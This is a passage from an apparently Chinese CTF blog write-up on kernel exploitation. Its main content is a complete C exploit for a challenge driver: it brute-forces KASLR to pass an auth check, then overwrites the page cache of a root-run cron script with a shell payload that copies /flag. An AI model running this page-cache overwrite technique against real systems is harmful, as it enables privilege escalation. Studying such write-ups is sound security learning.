<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdint.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/ioctl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/mman.h&gt;</span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_CREATE  0x1001</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_AUTH    0x1002</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_PIN     0x1003</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_LOAD    0x1004</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_VIEW    0x1005</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_WRITE   0x1007</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_SYNC    0x1008</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_QUERY   0x1009</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> MAGIC 0xf372fe94f82b3c6eULL</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> MASK  0xfffffffffffe0000ULL</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> KFREE_BASE 0xffffffff80000000ULL</span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span> &#123;<br>    <span class="hljs-type">int</span> dev = open(<span class="hljs-string">&quot;/dev/chronos_ring&quot;</span>, O_RDWR);<br>    <span class="hljs-keyword">if</span> (dev &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;open dev&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br><br>    <span class="hljs-comment">/* 1. Create buffer */</span><br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_CREATE, <span class="hljs-number">0</span>) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;CREATE fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Buffer created\n&quot;</span>);<br><br>    <span class="hljs-comment">/* 2. Write payload to buffer BEFORE loading file */</span><br>    <span class="hljs-type">char</span> payload[<span class="hljs-number">64</span>];<br>    <span class="hljs-built_in">memset</span>(payload, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(payload));<br>    <span class="hljs-built_in">strcpy</span>(payload, <span class="hljs-string">&quot;#!/bin/sh\ncat /flag&gt;/tmp/f\nchmod 777 /tmp/f\n#PADPAD\n&quot;</span>);<br>    <span class="hljs-type">int</span> plen = <span class="hljs-built_in">strlen</span>(payload);<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> &#123;</span> <span class="hljs-type">uint64_t</span> ptr; <span class="hljs-type">uint32_t</span> len; <span class="hljs-type">uint32_t</span> off; &#125; wr;<br>    wr.ptr = (<span class="hljs-type">uint64_t</span>)payload;<br>    wr.len = plen;<br>    wr.off = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_WRITE, &amp;wr) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;WRITE fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Payload written (%d bytes)\n&quot;</span>, plen);<br><br>    <span class="hljs-comment">/* 3. Brute-force KASLR for auth */</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[*] Brute-forcing KASLR...\n&quot;</span>);<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> &#123;</span> <span class="hljs-type">uint64_t</span> key; <span class="hljs-type">uint32_t</span> val; <span class="hljs-type">uint32_t</span> pad; &#125; ar;<br>    <span class="hljs-type">int</span> found = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2048</span>; i++) &#123;<br>        <span class="hljs-type">uint64_t</span> koff = (<span class="hljs-type">uint64_t</span>)i * <span class="hljs-number">0x200000U</span>LL;<br>        <span class="hljs-type">uint64_t</span> kfree = KFREE_BASE + koff;<br>        <span class="hljs-type">uint64_t</span> masked = (kfree &gt;&gt; <span class="hljs-number">4</span>) &amp; MASK;<br>        ar.key = MAGIC ^ masked;<br>        ar.val = <span class="hljs-number">0</span>;<br>        ar.pad = <span class="hljs-number">0</span>;<br>        <span class="hljs-keyword">if</span> (ioctl(dev, CMD_AUTH, &amp;ar) == <span class="hljs-number">0</span>) &#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Auth OK! KASLR offset=0x%lx (try %d)\n&quot;</span>, koff, i);<br>            found = <span class="hljs-number">1</span>;<br>            <span class="hljs-keyword">break</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">if</span> (!found) &#123;<br>        perror(<span class="hljs-string">&quot;[-] Auth brute-force failed&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br><br>    <span class="hljs-comment">/* 4. Open /tmp/job and load its file page */</span><br>    <span class="hljs-type">int</span> jfd = open(<span class="hljs-string">&quot;/tmp/job&quot;</span>, O_RDONLY);<br>    <span class="hljs-keyword">if</span> (jfd &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;open job&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> &#123;</span> <span class="hljs-type">uint32_t</span> fd; <span class="hljs-type">uint32_t</span> pidx; &#125; lr;<br>    lr.fd = jfd;<br>    lr.pidx = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_LOAD, &amp;lr) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;LOAD fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] File page loaded\n&quot;</span>);<br><br>    <span class="hljs-comment">/* 5. Pin a user page (sets flags &amp; 0x2) */</span><br>    <span class="hljs-type">void</span> *upage = mmap(<span class="hljs-literal">NULL</span>, <span class="hljs-number">4096</span>, PROT_READ | PROT_WRITE,<br>                       MAP_PRIVATE | MAP_ANONYMOUS, <span class="hljs-number">-1</span>, <span class="hljs-number">0</span>);<br>    <span class="hljs-keyword">if</span> (upage == MAP_FAILED) &#123;<br>        perror(<span class="hljs-string">&quot;mmap&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">memset</span>(upage, <span class="hljs-string">&#x27;A&#x27;</span>, <span class="hljs-number">4096</span>); <span class="hljs-comment">/* fault page in */</span><br>    <span class="hljs-type">uint64_t</span> uaddr = (<span class="hljs-type">uint64_t</span>)upage;<br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_PIN, &amp;uaddr) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;PIN fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] User page pinned\n&quot;</span>);<br><br>    <span class="hljs-comment">/* 6. Create view (backed by file page since file_loaded=1) */</span><br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_VIEW, <span class="hljs-number">0</span>) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;VIEW fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] View created\n&quot;</span>);<br><br>    <span class="hljs-comment">/* Verify */</span><br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> &#123;</span> <span class="hljs-type">uint32_t</span> flags; <span class="hljs-type">uint32_t</span> fl; <span class="hljs-type">uint32_t</span> vt; <span class="hljs-type">uint32_t</span> po; <span class="hljs-type">uint32_t</span> hp; &#125; qr;<br>    <span class="hljs-built_in">memset</span>(&amp;qr, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(qr));<br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_QUERY, &amp;qr) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;QUERY fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[*] flags=0x%x file_loaded=%d view_type=%d\n&quot;</span>, qr.flags, qr.fl, qr.vt);<br><br>    <span class="hljs-comment">/* 7. Sync buffer to file page cache via READ_VIEW */</span><br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> &#123;</span> <span class="hljs-type">uint64_t</span> unused; <span class="hljs-type">uint32_t</span> size; <span class="hljs-type">uint32_t</span> offset; &#125; rv;<br>    rv.unused = <span class="hljs-number">0</span>;<br>    rv.size = plen;<br>    rv.offset = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">if</span> (ioctl(dev, CMD_SYNC, &amp;rv) &lt; <span class="hljs-number">0</span>) &#123;<br>        perror(<span class="hljs-string">&quot;SYNC fail&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Page cache modified!\n&quot;</span>);<br><br>    <span class="hljs-comment">/* 8. Wait for root helper to execute */</span><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[*] Waiting for root cron (up to 5s)...\n&quot;</span>);<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">10</span>; i++) &#123;<br>        usleep(<span class="hljs-number">500000</span>);<br>        <span class="hljs-keyword">if</span> (access(<span class="hljs-string">&quot;/tmp/f&quot;</span>, F_OK) == <span class="hljs-number">0</span>) &#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Flag file appeared!\n&quot;</span>);<br>            <span class="hljs-type">char</span> buf[<span class="hljs-number">256</span>] = &#123;<span class="hljs-number">0</span>&#125;;<br>            <span class="hljs-type">int</span> ffd = open(<span class="hljs-string">&quot;/tmp/f&quot;</span>, O_RDONLY);<br>            <span class="hljs-keyword">if</span> (ffd &gt;= <span class="hljs-number">0</span>) &#123;<br>                read(ffd, buf, <span class="hljs-keyword">sizeof</span>(buf) - <span class="hljs-number">1</span>);<br>                close(ffd);<br>                <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[FLAG] %s\n&quot;</span>, buf);<br>            &#125;<br>            <span class="hljs-keyword">break</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">if</span> (access(<span class="hljs-string">&quot;/tmp/f&quot;</span>, F_OK) != <span class="hljs-number">0</span>) &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] Flag file not found, try waiting longer\n&quot;</span>);<br>    &#125;<br><br>    close(jfd);<br>    close(dev);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>拿下flag</p>
<p><img src="/images/134.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<h2 id="总结">总结</h2>
<p>感谢阅读...</p>
<p>生活愉快!</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Kernel/" class="category-chain-item">Kernel</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        
        
          <a href="/tags/kernel/" class="print-no-link">#kernel</a>
        
      
        
        
          <a href="/tags/pwn/" class="print-no-link">#pwn</a>
        
      
        
        
          <a href="/tags/root/" class="print-no-link">#root</a>
        
      
        
        
          <a href="/tags/qemu/" class="print-no-link">#qemu</a>
        
      
        
        
          <a href="/tags/linux/" class="print-no-link">#linux</a>
        
      
        
        
          <a href="/tags/page-cache/" class="print-no-link">#page cache</a>
        
      
        
        
          <a href="/tags/mmap/" class="print-no-link">#mmap</a>
        
      
        
        
          <a href="/tags/KASLR/" class="print-no-link">#KASLR</a>
        
      
        
        
          <a href="/tags/shell/" class="print-no-link">#shell</a>
        
      
        
        
          <a href="/tags/Buffer/" class="print-no-link">#Buffer</a>
        
      
        
        
          <a href="/tags/fd/" class="print-no-link">#fd</a>
        
      
        
        
          <a href="/tags/memcpy/" class="print-no-link">#memcpy</a>
        
      
        
        
          <a href="/tags/dirty-page/" class="print-no-link">#dirty page</a>
        
      
        
        
          <a href="/tags/flags/" class="print-no-link">#flags</a>
        
      
        
        
          <a href="/tags/bit-manipulation/" class="print-no-link">#bit manipulation</a>
        
      
        
        
          <a href="/tags/xor/" class="print-no-link">#xor</a>
        
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>hello kernel pwn!</div>
      <div>https://rr00xxyy.github.io/2026/04/05/hello-kernel-pwn/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>roxy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月5日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2026年6月29日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/04/06/Dirty-Pageflags-Kernel-pwn/" title="Dirty Pageflags Kernel pwn">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Dirty Pageflags Kernel pwn</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/01/network/" title="network">
                        <span class="hidden-mobile">network</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      <span class="footer-quote">nice to meet you</span>
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/mui-fluid.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
